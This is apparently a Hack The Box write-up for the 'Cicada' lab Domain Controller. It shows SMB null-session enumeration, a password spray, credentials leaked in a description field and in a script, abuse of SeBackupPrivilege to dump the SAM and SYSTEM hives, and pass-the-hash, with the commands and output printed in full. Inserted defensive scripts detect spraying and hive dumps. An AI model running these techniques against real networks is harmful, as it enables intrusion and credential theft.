Description

Cicada is an easy Hack The Box machine that features:

  • Domain Controller enumeration using a NULL session
  • User credentials recovered from a share accessible with a NULL session
  • Domain Controller enumeration using a domain account
  • User credentials recovered from the description of a domain user
  • User credentials recovered from a share accessible with a domain account
  • Initial access to the machine with a domain account that belongs to the Remote Management Users group
  • Privilege Escalation via a dump of the SAM database using a domain account with the SeBackupPrivilege privilege

Footprinting

First, we check with the ping command whether the machine is up and use the TTL to guess its operating system. The target machine IP address is 10.129.209.245.

$ ping -c 3 10.129.209.245
PING 10.129.209.245 (10.129.209.245) 56(84) bytes of data.
64 bytes from 10.129.209.245: icmp_seq=1 ttl=127 time=44.9 ms
64 bytes from 10.129.209.245: icmp_seq=2 ttl=127 time=44.5 ms
64 bytes from 10.129.209.245: icmp_seq=3 ttl=127 time=44.0 ms

--- 10.129.209.245 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 44.009/44.471/44.948/0.383 ms

The machine is active, and with a TTL of 127 (128 minus one hop) we can assume it is a Windows machine. Now we run an Nmap TCP SYN scan to find the open ports.

$ sudo nmap 10.129.209.245 -sS -oN nmap_scan
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.052s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

We get many open ports, typical of an Active Directory Domain Controller.

Enumeration

Then we run a more detailed scan of those ports, with service version detection and the default scripts.

$ nmap 10.129.209.245 -Pn -sV -sC -p53,88,135,139,389,445,464,636,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.047s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|_  start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.68 seconds

We get the services related to an Active Directory, specifically the Domain Controller CICADA-DC.cicada.htb. We add the host to our local /etc/hosts file.

$ echo "10.129.209.245 cicada.htb" | sudo tee -a /etc/hosts

We can start the enumeration by checking whether a NULL session is allowed, using the enum4linux-ng tool.

$ enum4linux-ng -As 10.129.209.245   
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.209.245
[*] Username ......... ''
[*] Random Username .. 'wryjxord'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
...
 ==========================================
|    RPC Session Check on 10.129.209.245    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wryjxord', password ''
[H] Rerunning enumeration with user 'wryjxord' might give more results

We see that NULL sessions are allowed, and that a random username (here wryjxord) also works. We can re-run the enumeration with the crackmapexec tool to list the available shares.

$ crackmapexec smb 10.129.209.245 -u 'wryjxord' -p '' --shares
SMB         10.129.209.245   445    CICADA-DC        [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.209.245   445    CICADA-DC        [+] cicada.htb\wryjxord: 
SMB         10.129.209.245   445    CICADA-DC        [+] Enumerated shares
SMB         10.129.209.245   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.209.245   445    CICADA-DC        -----           -----------     ------
SMB         10.129.209.245   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.209.245   445    CICADA-DC        C$                              Default share
SMB         10.129.209.245   445    CICADA-DC        DEV                             
SMB         10.129.209.245   445    CICADA-DC        HR              READ            
SMB         10.129.209.245   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.209.245   445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.209.245   445    CICADA-DC        SYSVOL                          Logon server share

We find the DEV share, which we cannot read, and the HR share, which we have read permission on. Let's connect to the HR share and download the available files.

$ smbclient '\\10.129.209.245\HR' -U 'wryjxord%'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024

                4168447 blocks of size 4096. 260699 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (7,0 KiloBytes/sec) (average 7,0 KiloBytes/sec)

We get the Notice from HR.txt file. In its contents we find a password, Cicada$M6Corpb*@Lp#nZp!8.

$ cat Notice\ from\ HR.txt                                   

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Now, with this password, we need to discover usernames for a password-spray attack. We can enumerate the domain users with the RID cycling technique and the crackmapexec tool.

$ crackmapexec smb 10.129.209.245 -u 'xnfjsk' -p '' --rid-brute | grep SidTypeUser
SMB         10.129.209.245  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.209.245  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

We find the domain users john.smoulder, sarah.dantelia, michael.wrightson, david.orelious and emily.oscars. Let's save them in a users file and password-spray them.

$ crackmapexec smb 10.129.209.245 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.209.245  445    CICADA-DC        [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.209.245  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.209.245  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.209.245  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.209.245  445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.209.245  445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
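From the defender's side, the spray above leaves a distinctive trace in the Domain Controller's Security log: one failed logon (event 4625) per sprayed account from a single source within seconds, followed by one success (event 4624) for the account that still has the default password. The detector below is an added example and not part of the original writeup; the event records are constructed for the example (the source IPs and timestamps are invented, the account names are the ones enumerated above).

```python
"""Detect a password spray from Windows failed-logon (4625) events.

Added example (not from the writeup). Sample records are constructed:
(timestamp, event id, target user, source ip, NTSTATUS).
"""
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [
    ("2024-08-28T19:40:01", 4625, "john.smoulder", "10.10.14.7", "0xC000006D"),
    ("2024-08-28T19:40:02", 4625, "sarah.dantelia", "10.10.14.7", "0xC000006D"),
    ("2024-08-28T19:40:02", 4624, "michael.wrightson", "10.10.14.7", "0x0"),
    ("2024-08-28T19:40:03", 4625, "david.orelious", "10.10.14.7", "0xC000006D"),
    ("2024-08-28T19:40:03", 4625, "emily.oscars", "10.10.14.7", "0xC000006D"),
    ("2024-08-28T19:40:09", 4625, "david.orelious", "10.10.14.7", "0xC000006D"),
    # one failure from another source: a mistyped password, not a spray
    ("2024-08-28T19:45:00", 4625, "emily.oscars", "192.168.50.23", "0xC000006D"),
]


def detect_spray(events, window=timedelta(minutes=5), min_users=3):
    """Return {source_ip: sorted distinct target users} for every source that
    failed against at least `min_users` distinct accounts inside any sliding
    window of length `window`. A single account failing repeatedly (brute
    force) does not trigger this; many accounts, one source, does."""
    failures_by_src = defaultdict(list)
    for ts, event_id, user, src, _status in events:
        if event_id == 4625:
            failures_by_src[src].append((datetime.fromisoformat(ts), user.lower()))

    hits = {}
    for src, fails in failures_by_src.items():
        fails.sort()
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits


def spray_followed_by_success(events):
    """Accounts that logged on successfully (4624) from a source flagged as
    spraying: these are the accounts whose password the spray guessed."""
    sprayers = detect_spray(events)
    return sorted({user for _ts, event_id, user, src, _ in events
                   if event_id == 4624 and src in sprayers})


if __name__ == "__main__":
    print("spraying sources:", detect_spray(EVENTS))
    print("compromised accounts:", spray_followed_by_success(EVENTS))
```

The window and threshold are tunable; in a real environment the same logic runs over 4625 events pulled from the DC (or 4771 Kerberos pre-authentication failures when the spray goes over Kerberos instead of SMB), and the success-after-spray correlation is what turns a noisy alert into an actionable one.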

We find that the password Cicada$M6Corpb*@Lp#nZp!8 belongs to michael.wrightson. Now we can use this credential to enumerate the domain with the enum4linux-ng tool, including the domain users and their descriptions.

$ enum4linux-ng -As -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
...
 =======================================
|    Users via RPC on 10.129.209.245    |
 =======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':   
  username: john.smoulder                                                          
  name: (null)                                                                     
  acb: '0x00000210'                                                                
  description: (null)                                                              
'1105':   
  username: sarah.dantelia                                                         
  name: (null)                                                                     
  acb: '0x00000210'                                                                
  description: (null)                                                              
'1106':   
  username: michael.wrightson                                                      
  name: (null)                                                                     
  acb: '0x00000210'                                                                
  description: (null)                                                              
'1108':   
  username: david.orelious                                                         
  name: (null)                                                                     
  acb: '0x00000210'                                                                
  description: Just in case I forget my password is aRt$Lp#7t*VQ!3                 
'1601':   
  username: emily.oscars                                                           
  name: Emily Oscars                                                               
  acb: '0x00000210'                                                                
  description: (null)                                                              
'500':    
  username: Administrator                                                          
  name: (null)                                                                     
  acb: '0x00000210'                                                                
  description: Built-in account for administering the computer/domain              
'501':    
  username: Guest                                                                  
  name: (null)                                                                     
  acb: '0x00000214'                                                                
  description: Built-in account for guest access to the computer/domain            
'502':    
  username: krbtgt                                                                 
  name: (null)                                                                     
  acb: '0x00020011'                                                                
  description: Key Distribution Center Service Account
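A credential stored in an account description is readable by every authenticated domain user, so this is worth auditing regularly rather than discovering during a test. The script below is an added example, not part of the original writeup: it parses the enum4linux-ng user listing shown above, decodes the samr account-control (acb) bits (the ACB_* values from MS-SAMR) and flags descriptions that look like they disclose a password. The sample input is a constructed excerpt in the same layout; the password in the david.orelious entry is replaced by a made-up value.

```python
"""Audit the enum4linux-ng user listing for weak account settings and
credentials leaked through the description field.

Added example (not from the writeup). SAMPLE_USERS is constructed.
"""
import re

# samr account-control bits (MS-SAMR ACB_* flags); only the commonly used subset
ACB_FLAGS = {
    0x0001: "ACB_DISABLED",
    0x0004: "ACB_PWNOTREQ",
    0x0010: "ACB_NORMAL",
    0x0200: "ACB_PWNOEXP",
    0x0400: "ACB_AUTOLOCK",
    0x1000: "ACB_SMARTCARD_REQUIRED",
    0x2000: "ACB_TRUSTED_FOR_DELEGATION",
    0x10000: "ACB_DONT_REQUIRE_PREAUTH",
    0x20000: "ACB_PW_EXPIRED",
}

# a credential hint word plus a token of 8+ chars mixing digits and symbols
CRED_HINT = re.compile(r"\b(password|passwd|pwd|pass|credential)\b", re.I)
SECRET_TOKEN = re.compile(r"(?=\S*\d)(?=\S*[^\w\s])\S{8,}")

SAMPLE_USERS = """\
'1104':
  username: john.smoulder
  name: (null)
  acb: '0x00000210'
  description: (null)
'1108':
  username: david.orelious
  name: (null)
  acb: '0x00000210'
  description: Just in case I forget my password is Xy7#zq!Lm9
'501':
  username: Guest
  name: (null)
  acb: '0x00000214'
  description: Built-in account for guest access to the computer/domain
'502':
  username: krbtgt
  name: (null)
  acb: '0x00020011'
  description: Key Distribution Center Service Account
"""


def decode_acb(acb):
    """Names of the ACB_* bits set in an account-control value."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_users(text):
    """Turn the "'<rid>':" / indented key: value entries into a list of dicts."""
    users, current = [], None
    for line in text.splitlines():
        head = re.match(r"^'(\d+)':\s*$", line)
        if head:
            current = {"rid": int(head.group(1))}
            users.append(current)
            continue
        field = re.match(r"^\s+(username|name|acb|description):\s*(.*?)\s*$", line)
        if field and current is not None:
            key, val = field.groups()
            if key == "acb":
                val = int(val.strip("'"), 16)
            elif val == "(null)":
                val = None
            current[key] = val
    return users


def description_leaks_credential(desc):
    """Heuristic: a hint word such as 'password' next to a password-shaped token."""
    return bool(desc and CRED_HINT.search(desc) and SECRET_TOKEN.search(desc))


def audit(text):
    findings = {"leaked_descriptions": [], "password_never_expires": [],
                "password_not_required": [], "disabled": []}
    for u in parse_users(text):
        flags = decode_acb(u.get("acb", 0))
        if description_leaks_credential(u.get("description")):
            findings["leaked_descriptions"].append(u["username"])
        if "ACB_PWNOEXP" in flags:
            findings["password_never_expires"].append(u["username"])
        if "ACB_PWNOTREQ" in flags:
            findings["password_not_required"].append(u["username"])
        if "ACB_DISABLED" in flags:
            findings["disabled"].append(u["username"])
    return findings


if __name__ == "__main__":
    for key, names in audit(SAMPLE_USERS).items():
        print(f"{key}: {names}")
```

The description heuristic over-flags URLs and ticket references that happen to contain digits and symbols, so treat its output as a review list. The acb decoding is the more reliable part: it surfaces accounts whose password never expires or is not required, which are exactly the ones a leaked default password keeps working against.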

We find the password of the david.orelious user, aRt$Lp#7t*VQ!3, in his account description. We can enumerate the domain shares again with this user.

$ crackmapexec smb 10.129.209.245 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.209.245  445    CICADA-DC        [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.209.245  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.209.245  445    CICADA-DC        [+] Enumerated shares
SMB         10.129.209.245  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.209.245  445    CICADA-DC        -----           -----------     ------
SMB         10.129.209.245  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.209.245  445    CICADA-DC        C$                              Default share
SMB         10.129.209.245  445    CICADA-DC        DEV             READ            
SMB         10.129.209.245  445    CICADA-DC        HR              READ            
SMB         10.129.209.245  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.209.245  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.209.245  445    CICADA-DC        SYSVOL          READ            Logon server share

With this user we have read access to the DEV share, so we connect to it and download its files.

$ smbclient '\\10.129.209.245\DEV' -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

                4168447 blocks of size 4096. 332275 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,3 KiloBytes/sec) (average 3,3 KiloBytes/sec)

We get the Backup_script.ps1 script, which contains the credentials of emily.oscars with the password Q!3@Lp#M6b*7t*Vt.

$ cat Backup_script.ps1                                                           

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
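The script above is the classic case of a plaintext password committed to a file on a readable share: ConvertTo-SecureString -AsPlainText with a string literal gives no protection at all, since the literal sits in the source. A share-scanning check for this pattern is an added example, not part of the original writeup; it runs over a constructed variant of the script with placeholder secrets, and the variable names it looks for ($password, $pass, $pwd, $secret) are an assumption about common naming.

```python
"""Flag hard-coded credentials in PowerShell scripts pulled from a share.

Added example (not from the writeup). SAMPLE_SCRIPT is a constructed
variant of Backup_script.ps1 with placeholder secrets.
"""
import re

PATTERNS = {
    # ConvertTo-SecureString "<literal>" ... -AsPlainText
    "ConvertTo-SecureString with literal": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1[^\n]*-AsPlainText", re.I),
    # $password = "<literal>"   (also $pass, $pwd, $secret; assumed naming)
    "plaintext password variable": re.compile(
        r"\$(?:pass(?:word)?|pwd|secret)\s*=\s*(['\"])(?P<secret>.+?)\1", re.I),
}

SAMPLE_SCRIPT = r'''
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "svc_backup"
$password = ConvertTo-SecureString "Placeholder-Secret-1" -AsPlainText -Force
$pwd = 'another-placeholder-2'
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\Backup\smb_backup.zip"
'''


def mask(secret):
    """Keep the first two characters so a finding can be matched to the file
    without the report itself becoming a second copy of the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_hardcoded_secrets(script_text):
    """Return (line number, pattern label, masked secret) for every hit."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for label, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append((lineno, label, mask(m.group("secret"))))
    return findings


if __name__ == "__main__":
    for lineno, label, masked in find_hardcoded_secrets(SAMPLE_SCRIPT):
        print(f"line {lineno}: {label}: {masked}")
```

The fix on the Windows side is to keep the secret out of the script entirely: run the backup under a group Managed Service Account, or store the credential with Export-Clixml (DPAPI-protected to the account and host that wrote it) and load it at run time. Either way, a share that is readable by ordinary domain users should never hold the only copy of a service password.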

Exploitation

We can connect to the machine over WinRM and obtain a shell with the emily.oscars user, who belongs to the Remote Management Users group.

$ evil-winrm -i 10.129.209.245 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars

Post-Exploitation

We find that the emily.oscars user has the SeBackupPrivilege privilege.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

With this privilege we can save the SYSTEM and SAM registry hives and then download the files with the download function of evil-winrm.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\system to system
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\sam to sam
                                        
Info: Download successful!

Then, on our own system, we can use impacket-secretsdump to extract the Administrator NTLM hash, 2b87e7c93a3e8a0ea4a581937016f341.

$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
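Two Security-log events catch this privilege escalation path: 4672 (special privileges assigned to new logon), which lists SeBackupPrivilege whenever an account holding it logs on, and 4688 (process creation, with command-line auditing enabled), which records the reg save of the SAM and SYSTEM hives. The detection logic below is an added example and not part of the original writeup; the account names are the ones from the writeup, while the allowlist, the svc_backup account and the record layout are assumptions constructed for the example.

```python
"""Detection logic for SeBackupPrivilege abuse via hive dumping.

Added example (not from the writeup). RECORDS are constructed Security-log
excerpts; EXPECTED_BACKUP_ACCOUNTS is a hypothetical allowlist.
"""
import re

# accounts that are supposed to hold SeBackupPrivilege (hypothetical allowlist)
EXPECTED_BACKUP_ACCOUNTS = {"cicada\\administrator", "cicada\\svc_backup"}

# reg save of a hive that holds credential material
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)

RECORDS = [
    {"id": 4672, "account": "CICADA\\Administrator",
     "privileges": "SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege"},
    {"id": 4672, "account": "CICADA\\emily.oscars",
     "privileges": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4688, "account": "CICADA\\emily.oscars",
     "process": "C:\\Windows\\System32\\reg.exe", "command_line": "reg save hklm\\sam sam"},
    {"id": 4688, "account": "CICADA\\emily.oscars",
     "process": "C:\\Windows\\System32\\reg.exe", "command_line": "reg save hklm\\system system"},
    {"id": 4688, "account": "CICADA\\emily.oscars",
     "process": "C:\\Windows\\System32\\reg.exe",
     "command_line": "reg query hklm\\software\\microsoft\\windows\\currentversion"},
]


def unexpected_backup_logons(records, expected=EXPECTED_BACKUP_ACCOUNTS):
    """Accounts granted SeBackupPrivilege at logon (4672) that are not allowlisted."""
    hits = []
    for r in records:
        if r["id"] != 4672:
            continue
        privileges = r["privileges"].split()
        if "SeBackupPrivilege" in privileges and r["account"].lower() not in expected:
            hits.append(r["account"])
    return hits


def hive_dump_commands(records):
    """(account, hive) for 4688 records whose command line saves a sensitive hive."""
    hits = []
    for r in records:
        if r["id"] != 4688:
            continue
        m = HIVE_SAVE.search(r.get("command_line", ""))
        if m:
            hits.append((r["account"], m.group(1).lower()))
    return hits


def alerts(records):
    """Combine both checks into one list of human-readable alerts."""
    out = [f"unexpected SeBackupPrivilege logon: {a}" for a in unexpected_backup_logons(records)]
    out += [f"hive dump by {a}: hklm\\{h}" for a, h in hive_dump_commands(records)]
    return out


if __name__ == "__main__":
    for line in alerts(RECORDS):
        print(line)
```

4672 fires for every administrative logon, so the allowlist (or a baseline of who normally triggers it) is what keeps the first check quiet. The 4688 check is the higher-fidelity signal, but only if process command-line auditing is turned on; without it the event shows reg.exe and nothing else. Granting a user SeBackupPrivilege, directly or through a group such as Backup Operators, is equivalent to handing over the local Administrator hash of the Domain Controller, which is why that membership deserves the same review as Domain Admins.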

Now we can use the NTLM hash to log in to the machine with pass-the-hash.

$ evil-winrm -i 10.129.209.241 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

Flags

With the Administrator session we can read the user and root flags.

*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\emily.oscars.CICADA\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\Administrator\Desktop\root.txt
<REDACTED>